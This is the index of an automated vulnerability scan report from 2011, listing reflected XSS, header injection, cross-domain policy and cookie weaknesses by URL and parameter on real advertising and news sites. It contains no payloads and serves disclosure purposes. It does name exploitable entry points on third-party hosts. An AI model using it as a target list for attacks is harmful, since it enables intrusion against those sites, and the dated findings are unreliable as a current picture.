XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 08:37:03 CDT 2011.

Loading


1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article [REST URL parameter 1]

1.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

2.10. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [b parameter]

2.11. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cid parameter]

2.12. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [count parameter]

2.13. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cpnmodule parameter]

2.14. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [e parameter]

2.15. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [epartner parameter]

2.16. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [event parameter]

2.17. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [h parameter]

2.18. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [l parameter]

2.19. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [nd parameter]

2.20. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [o parameter]

2.21. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [oepartner parameter]

2.22. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [orh parameter]

2.23. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [p parameter]

2.24. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pdom parameter]

2.25. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pg parameter]

2.26. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pid parameter]

2.27. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pp parameter]

2.28. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ppartner parameter]

2.29. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pt parameter]

2.30. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [ra parameter]

2.31. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [rqid parameter]

2.32. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sg parameter]

2.33. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [site parameter]

2.34. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sz parameter]

2.35. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [t parameter]

2.36. http://ad.doubleclick.net/adj/pcw.main.blogs/bizfeed/index [blg parameter]

2.37. http://ad.doubleclick.net/adj/pcw.main.news/products/computers/laptops/article [blg parameter]

2.38. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.39. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.40. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

2.41. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

2.42. http://adserving2.cpxinteractive.com/st [ad_size parameter]

2.43. http://adserving2.cpxinteractive.com/st [ad_size parameter]

2.44. http://adserving2.cpxinteractive.com/st [section parameter]

2.45. http://adserving2.cpxinteractive.com/st [section parameter]

2.46. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxheight parameter]

2.47. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxwidth parameter]

2.48. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [mode parameter]

2.49. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxheight parameter]

2.50. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxwidth parameter]

2.51. http://api.freebase.com/api/trans/image_thumb/en/gadget [mode parameter]

2.52. http://api.freebase.com/api/trans/image_thumb/en/google [maxheight parameter]

2.53. http://api.freebase.com/api/trans/image_thumb/en/google [maxwidth parameter]

2.54. http://api.freebase.com/api/trans/image_thumb/en/google [mode parameter]

2.55. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxheight parameter]

2.56. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxwidth parameter]

2.57. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [mode parameter]

2.58. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxheight parameter]

2.59. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxwidth parameter]

2.60. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [mode parameter]

2.61. http://api.freebase.com/api/trans/image_thumb/en/skype [maxheight parameter]

2.62. http://api.freebase.com/api/trans/image_thumb/en/skype [maxwidth parameter]

2.63. http://api.freebase.com/api/trans/image_thumb/en/skype [mode parameter]

2.64. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxheight parameter]

2.65. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxwidth parameter]

2.66. http://api.freebase.com/api/trans/image_thumb/en/youtube [mode parameter]

2.67. http://apptap.scripps.com/apptap3 [app parameter]

2.68. http://apptap.scripps.com/apptap3 [app parameter]

2.69. http://apptap.scripps.com/apptap3 [path parameter]

2.70. http://apptap.scripps.com/apptap3 [site parameter]

2.71. http://apptap.scripps.com/apptap3 [site parameter]

2.72. http://apptap.scripps.com/apptap3 [title parameter]

2.73. http://apptap.scripps.com/apptap3 [title parameter]

2.74. http://apptap.scripps.com/apptap3 [topic parameter]

2.75. http://apptap.scripps.com/apptap3 [topic parameter]

2.76. http://ar.voicefive.com/b/rc.pli [func parameter]

2.77. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.78. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.79. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.80. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.81. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.82. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.83. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.84. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.85. http://button.topsy.com/widget/retweet-json [callback parameter]

2.86. http://button.topsy.com/widget/retweet-json [id parameter]

2.87. http://choices.truste.com/ca [c parameter]

2.88. http://choices.truste.com/ca [h parameter]

2.89. http://choices.truste.com/ca [iplc parameter]

2.90. http://choices.truste.com/ca [ox parameter]

2.91. http://choices.truste.com/ca [plc parameter]

2.92. http://choices.truste.com/ca [w parameter]

2.93. http://choices.truste.com/ca [zi parameter]

2.94. http://cm.npc-scripps.overture.com/js_1_0/ [css_url parameter]

2.95. http://guidepolls.about.com/urbanlegends/8140502316/poll.js [linkback parameter]

2.96. http://hits.nextstat.com/cgi-bin/wsv2.cgi [108645 parameter]

2.97. http://ib.adnxs.com/ptj [redir parameter]

2.98. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

2.99. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

2.100. http://js.revsci.net/gateway/gw.js [bpid parameter]

2.101. http://js.revsci.net/gateway/gw.js [csid parameter]

2.102. http://mads.com.com/mac-ad [&&&&&&adfile parameter]

2.103. http://mads.com.com/mac-ad [BRAND parameter]

2.104. http://mads.com.com/mac-ad [BRAND parameter]

2.105. http://mads.com.com/mac-ad [CELT parameter]

2.106. http://mads.com.com/mac-ad [SITE parameter]

2.107. http://mads.com.com/mac-ad [SITE parameter]

2.108. http://mads.com.com/mac-ad [_RGROUP parameter]

2.109. http://mads.zdnet.com/mac-ad [ADREQ&beacon parameter]

2.110. http://mads.zdnet.com/mac-ad [PAGESTATE parameter]

2.111. http://mads.zdnet.com/mac-ad [SITE parameter]

2.112. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

2.113. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.114. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.115. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

2.116. http://services.digg.com/1.0/endpoint [callback parameter]

2.117. http://services.digg.com/1.0/endpoint [method parameter]

2.118. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

2.119. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [bullet parameter]

2.120. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [title parameter]

2.121. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [track parameter]

2.122. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [viewmore parameter]

2.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

2.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

2.125. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 1]

2.126. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 2]

2.127. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 3]

2.128. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 4]

2.129. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 5]

2.130. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]

2.131. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [REST URL parameter 4]

2.132. http://www.zdnet.com/favicon.ico [REST URL parameter 1]

2.133. http://z.about.com/6g/ip/284/27.htm [s parameter]

2.134. http://adserving2.cpxinteractive.com/st [Referer HTTP header]

2.135. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

2.136. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

2.137. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.138. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.139. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.140. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.141. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.142. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.143. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

2.144. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

2.145. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.146. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

2.152. http://hits.nextstat.com/scripts/wsb.php [webStat_108645 cookie]

2.153. http://seg.sharethis.com/getSegment.php [__stid cookie]

2.154. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

2.155. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

2.156. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm [jsc cookie]

3. Flash cross-domain policy

3.1. http://a.tribalfusion.com/crossdomain.xml

3.2. http://ad-emea.doubleclick.net/crossdomain.xml

3.3. http://ad.doubleclick.net/crossdomain.xml

3.4. http://ajax.googleapis.com/crossdomain.xml

3.5. http://altfarm.mediaplex.com/crossdomain.xml

3.6. http://ar.voicefive.com/crossdomain.xml

3.7. http://b.scorecardresearch.com/crossdomain.xml

3.8. http://b.voicefive.com/crossdomain.xml

3.9. http://bs.serving-sys.com/crossdomain.xml

3.10. http://cdn.eyewonder.com/crossdomain.xml

3.11. http://cdn.gigya.com/crossdomain.xml

3.12. http://core.insightexpressai.com/crossdomain.xml

3.13. http://ds.serving-sys.com/crossdomain.xml

3.14. http://feeds.delicious.com/crossdomain.xml

3.15. http://gscounters.gigya.com/crossdomain.xml

3.16. http://js.revsci.net/crossdomain.xml

3.17. http://mashable.com/crossdomain.xml

3.18. http://ping.crowdscience.com/crossdomain.xml

3.19. http://pix04.revsci.net/crossdomain.xml

3.20. http://pixel.quantserve.com/crossdomain.xml

3.21. http://s.gravatar.com/crossdomain.xml

3.22. http://static.crowdscience.com/crossdomain.xml

3.23. http://tags.bluekai.com/crossdomain.xml

3.24. http://tags.crwdcntrl.net/crossdomain.xml

3.25. http://www.pcworld.com/crossdomain.xml

3.26. http://adx.g.doubleclick.net/crossdomain.xml

3.27. http://googleads.g.doubleclick.net/crossdomain.xml

3.28. http://mads.com.com/crossdomain.xml

3.29. http://mads.zdnet.com/crossdomain.xml

3.30. http://network.alluremedia.com.au/crossdomain.xml

3.31. http://pubads.g.doubleclick.net/crossdomain.xml

3.32. http://services.digg.com/crossdomain.xml

3.33. http://static.ak.fbcdn.net/crossdomain.xml

3.34. http://tags.gawker.com/crossdomain.xml

3.35. http://www.facebook.com/crossdomain.xml

3.36. http://www.stumbleupon.com/crossdomain.xml

3.37. http://www.youtube.com/crossdomain.xml

3.38. http://www.zdnet.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

4.2. http://ad.doubleclick.net/clientaccesspolicy.xml

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.4. http://b.voicefive.com/clientaccesspolicy.xml

4.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://crenk.com/buy-chromebook/

5.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

5.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

5.4. http://www.pcworld.com/pcworldconnect/comment_registration

6. Session token in URL

6.1. http://l.sharethis.com/pview

6.2. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

6.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

6.4. http://www.facebook.com/extern/login_status.php

7. Password field submitted using GET method

8. Cookie scoped to parent domain

8.1. http://api.twitter.com/1/statuses/user_timeline.json

8.2. http://t.mookie1.com/t/v1/imp

8.3. http://www.imdb.com/title/tt0758746/

8.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

8.5. http://a.tribalfusion.com/displayAd.js

8.6. http://a.tribalfusion.com/j.ad

8.7. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

8.8. http://ads.adbrite.com/adserver/behavioral-data/8201

8.9. http://ads.adbrite.com/adserver/behavioral-data/8203

8.10. http://ads.pointroll.com/PortalServe/

8.11. http://ads.revsci.net/adserver/ako

8.12. http://ads.revsci.net/adserver/ako

8.13. http://adx.adnxs.com/mapuid

8.14. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

8.15. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

8.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

8.17. http://ar.voicefive.com/b/wc_beacon.pli

8.18. http://ar.voicefive.com/bmx3/broker.pli

8.19. http://ar.voicefive.com/bmx3/broker.pli

8.20. http://as.casalemedia.com/j

8.21. http://as.casalemedia.com/j

8.22. http://as.casalemedia.com/s

8.23. http://b.scorecardresearch.com/b

8.24. http://b.scorecardresearch.com/p

8.25. http://b.scorecardresearch.com/r

8.26. http://b.voicefive.com/b

8.27. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

8.28. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

8.29. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

8.30. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

8.31. http://bidder.mathtag.com/iframe/notify

8.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

8.33. http://bstats.adbrite.com/click/bstats.gif

8.34. http://cm.npc-gatehouse.overture.com/js_1_0/

8.35. http://cm.npc-scripps.overture.com/js_1_0/

8.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

8.37. http://dw.zdnet.com/clear/c.gif

8.38. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623

8.39. http://hits.nextstat.com/cgi-bin/wsv2.cgi

8.40. http://hits.nextstat.com/scripts/wsb.php

8.41. http://ib.adnxs.com/ptj

8.42. http://ib.adnxs.com/seg

8.43. http://image2.pubmatic.com/AdServer/Pug

8.44. http://image3.pubmatic.com/AdServer/UPug

8.45. http://js.revsci.net/gateway/gw.js

8.46. http://load.exelator.com/load/

8.47. http://loadm.exelator.com/load/

8.48. http://loadus.exelator.com/load/

8.49. http://m.adnxs.com/msftcookiehandler

8.50. http://map.media6degrees.com/orbserv/hbpix

8.51. http://odb.outbrain.com/utils/get

8.52. http://odb.outbrain.com/utils/ping.html

8.53. http://p.brilig.com/contact/bct

8.54. http://pbid.pro-market.net/engine

8.55. http://pc2.yumenetworks.com/dynamic_btx/115_89795

8.56. http://ping.crowdscience.com/ping.js

8.57. http://pix04.revsci.net/D08734/a1/0/0/0.gif

8.58. http://pix04.revsci.net/D08734/a3/0/3/0.gif

8.59. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif

8.60. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

8.61. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js

8.62. http://pixel.mathtag.com/data/img

8.63. http://pixel.quantserve.com/pixel

8.64. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

8.65. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

8.66. http://pixel.quantserve.com/seg/r

8.67. http://r.openx.net/set

8.68. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

8.69. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

8.70. http://rcm.amazon.com/e/cm

8.71. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.72. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

8.73. http://sync.mathtag.com/sync/img

8.74. http://t.invitemedia.com/track_imp

8.75. http://tags.bluekai.com/site/2989

8.76. http://tags.bluekai.com/site/3307

8.77. http://tags.bluekai.com/site/3319

8.78. http://tags.bluekai.com/site/450

8.79. http://uts.amazon.com/uts/IaR

8.80. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap

8.81. http://www.facebook.com/profile/pic.php

8.82. http://www.youtube.com/embed/TVqe8ieqz10

8.83. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

8.84. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

9. Cookie without HttpOnly flag set

9.1. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php

9.2. http://mysuburbanlife.mycapture.com/mycapture/scripts/remote.asp

9.3. http://t.mookie1.com/t/v1/imp

9.4. http://www.crowdsavings.com/r/banner/170x170/milehighonthecheap

9.5. http://www.imdb.com/title/tt0758746/

9.6. http://www.pcworld.com/articleComment/get.do

9.7. http://www.pcworld.com/articleVote/get.do

9.8. http://www.pcworld.com/pcworldconnect/a

9.9. http://www.pcworld.com/pcworldconnect/comment_registration

9.10. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

9.11. http://a.tribalfusion.com/displayAd.js

9.12. http://a.tribalfusion.com/j.ad

9.13. http://a1.interclick.com/getInPageJSProcess.aspx

9.14. http://a1.interclick.com/getInPageJSProcess.aspx

9.15. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

9.16. http://ad.yieldmanager.com/imp

9.17. http://ad.yieldmanager.com/pixel

9.18. http://ads.adbrite.com/adserver/behavioral-data/8201

9.19. http://ads.adbrite.com/adserver/behavioral-data/8203

9.20. http://ads.cpxadroit.com/adserver/10-3QKLX5UTS2G94.cpxad

9.21. http://ads.pointroll.com/PortalServe/

9.22. http://ads.revsci.net/adserver/ako

9.23. http://ads.revsci.net/adserver/ako

9.24. http://ads.undertone.com/aj

9.25. http://ads.undertone.com/fc.php

9.26. http://ads.undertone.com/l

9.27. http://ads.undertone.com/l

9.28. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

9.29. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

9.30. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

9.31. http://apex.com.com/aws/rest/v1.0/offerScript

9.32. http://api.twitter.com/1/statuses/user_timeline.json

9.33. http://ar.voicefive.com/b/wc_beacon.pli

9.34. http://ar.voicefive.com/bmx3/broker.pli

9.35. http://ar.voicefive.com/bmx3/broker.pli

9.36. http://as.casalemedia.com/j

9.37. http://as.casalemedia.com/j

9.38. http://as.casalemedia.com/s

9.39. http://b.scorecardresearch.com/b

9.40. http://b.scorecardresearch.com/p

9.41. http://b.scorecardresearch.com/r

9.42. http://b.voicefive.com/b

9.43. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

9.44. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

9.45. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

9.46. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

9.47. http://bidder.mathtag.com/iframe/notify

9.48. http://bpx.a9.com/ads/getad

9.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.50. http://bstats.adbrite.com/click/bstats.gif

9.51. http://cm.npc-gatehouse.overture.com/js_1_0/

9.52. http://cm.npc-scripps.overture.com/js_1_0/

9.53. http://core.insightexpressai.com/adServer/adServerESI.aspx

9.54. http://crenk.com/buy-chromebook/

9.55. http://csc.beap.ad.yieldmanager.net/i

9.56. http://dw.zdnet.com/clear/c.gif

9.57. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623

9.58. http://hits.nextstat.com/cgi-bin/wsv2.cgi

9.59. http://hits.nextstat.com/scripts/wsb.php

9.60. http://image2.pubmatic.com/AdServer/Pug

9.61. http://image3.pubmatic.com/AdServer/UPug

9.62. http://js.revsci.net/gateway/gw.js

9.63. http://load.exelator.com/load/

9.64. http://loadm.exelator.com/load/

9.65. http://loadus.exelator.com/load/

9.66. http://map.media6degrees.com/orbserv/hbpix

9.67. http://network.alluremedia.com.au/network/www/delivery/afr.php

9.68. http://network.alluremedia.com.au/network/www/delivery/ajs.php

9.69. http://network.alluremedia.com.au/network/www/delivery/lg.php

9.70. http://odb.outbrain.com/utils/get

9.71. http://odb.outbrain.com/utils/ping.html

9.72. http://open.ad.yieldmanager.net/a1

9.73. http://p.brilig.com/contact/bct

9.74. http://pbid.pro-market.net/engine

9.75. http://pc2.yumenetworks.com/dynamic_btx/115_89795

9.76. http://ping.crowdscience.com/ping.js

9.77. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.78. http://pix04.revsci.net/D08734/a3/0/3/0.gif

9.79. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif

9.80. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif

9.81. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js

9.82. http://pixel.mathtag.com/data/img

9.83. http://pixel.quantserve.com/pixel

9.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

9.85. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

9.86. http://pixel.quantserve.com/seg/r

9.87. http://r.openx.net/set

9.88. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

9.89. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

9.90. http://rcm.amazon.com/e/cm

9.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet

9.92. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

9.93. http://statse.webtrendslive.com/dcshk2h3ouz5bdzhx6ilj0lvi_2m1v/dcs.gif

9.94. http://sync.mathtag.com/sync/img

9.95. http://t.invitemedia.com/track_imp

9.96. http://tags.bluekai.com/site/2989

9.97. http://tags.bluekai.com/site/3307

9.98. http://tags.bluekai.com/site/3319

9.99. http://tags.bluekai.com/site/450

9.100. http://tenzing.fmpub.net/

9.101. http://uts.amazon.com/uts/IaR

9.102. http://warnerbros.112.2o7.net/b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861

9.103. http://www.blogged.com/icons/vn_reganl_8165.gif

9.104. http://www.etracker.de/cnt.php

9.105. http://www.facebook.com/profile/pic.php

9.106. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

9.107. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

9.108. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

9.109. http://www.youtube.com/embed/TVqe8ieqz10

9.110. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

9.111. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

10. Password field with autocomplete enabled

10.1. http://crenk.com/buy-chromebook/

10.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

10.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

10.4. http://www.pcworld.com/pcworldconnect/comment_registration

11. Referer-dependent response

11.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.2. http://ad.yieldmanager.com/imp

11.3. http://ads.adbrite.com/adserver/behavioral-data/8201

11.4. http://ads.adbrite.com/adserver/behavioral-data/8203

11.5. http://adserving2.cpxinteractive.com/st

11.6. http://api.twitter.com/1/statuses/user_timeline.json

11.7. http://bstats.adbrite.com/click/bstats.gif

11.8. http://csi.gstatic.com/csi

11.9. http://mads.com.com/mac-ad

11.10. http://network.alluremedia.com.au/network/www/delivery/afr.php

11.11. http://vimeo.com/moogaloop.swf

11.12. http://www.facebook.com/plugins/activity.php

11.13. http://www.facebook.com/plugins/like.php

